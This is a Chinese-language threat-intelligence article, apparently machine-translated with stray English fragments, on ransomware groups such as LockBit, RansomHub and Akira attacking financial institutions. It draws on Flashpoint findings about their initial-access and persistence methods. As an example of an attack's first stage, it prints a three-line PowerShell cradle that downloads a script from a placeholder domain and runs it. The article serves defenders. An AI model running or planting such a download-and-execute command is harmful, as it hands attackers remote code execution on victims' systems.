金融部门已成为复杂勒索软件业务的主要目标,在2024年4月至2025年4月期间记录了惊人的406起公开披露的事件。
这些攻击已经显示出越来越先进的技术能力和战略定位,造成重大运营中断并暴露敏感的财务数据。
高价值资产的集中和金融服务的关键性质使这些机构特别容易受到赎金需求的影响,威胁行为者利用这一紧迫性最大限度地提高其非法利润。
这些攻击的一个令人担忧的趋势是勒索软件部署策略的快速演变,威胁行为者同时利用多个向量在金融网络中建立持久性。
最多产的团体RansomHub,Akira,LockBit,Scattered Spider和Lazarus Group开发了专门的技术来绕过银行基础设施中常见的安全控制,通常将恶意代码嵌入到看似合法的财务文档格式中以逃避检测。
他们的操作显示,在触发加密程序之前持续数周或数月的侦察时间,允许最大的数据泄漏和横向移动。
identifiedFlashpoint分析师发现这些顶级对手的技术复杂程度,并指出许多人采用了土地生活技术,滥用本机Windows管理工具将恶意活动与合法操作相结合。
事实证明,这种方法对在金融机构中部署的传统基于签名的检测系统特别有效。
分析师进一步观察到,PowerShell脚本经常用于建立持久性机制,许多攻击始于受损的VPN凭据或未修补的远程访问系统。
这些攻击背后的经济动机是明确无误的,赎金要求经常校准到受害者年收入的百分比 – 这是通过仔细的攻击前情报收集实现的计算。
这种针对性的精确性表明,这些威胁行为者在规划针对金融机构的运动时所采取的有条不紊的方法,通常根据监管备案数据和公共财务披露来选择受害者。
初始访问技术:金融系统的门户
在这406起事件中观察到的主要感染媒介涉及针对具有特权访问的员工的复杂社会工程运动。
在典型的攻击序列中,威胁行为者首先提供包含启动感染链的隐藏宏代码的特制文档:
$webclient = New-Object System.Net.WebClient
$payload = $webclient.DownloadString('https://compromised-domain.com/payload.ps1')
Invoke-Expression $payload
这种初始访问代码通常在删除更复杂的恶意软件组件之前与命令和控制基础设施建立联系。
值得注意的是,theft tools凭据盗窃工具在攻击序列的早期部署,可以实现跨金融网络的横向移动。
记录在案的几起事件涉及操纵合法的管理工具,如BgInfo和Sysinternals实用程序,以建立持久性,而不会触发安全警报 – Flashpoint研究人员专门归因于针对银行基础设施的LockBit操作。LockBit
勒索软件集团在目标定位策略方面表现出了显着的适应性,RansomHub仅在2024年2月出现,但通过复杂的供应链妥协迅速声称38名金融部门受害者。
与此同时,Akira的活动展示了与已解散的Conti勒索软件集团的潜在联系Conti ransomware,这表明这些犯罪企业之间的专业知识保持连续性。
发表评论
您还未登录,请先登录。
登录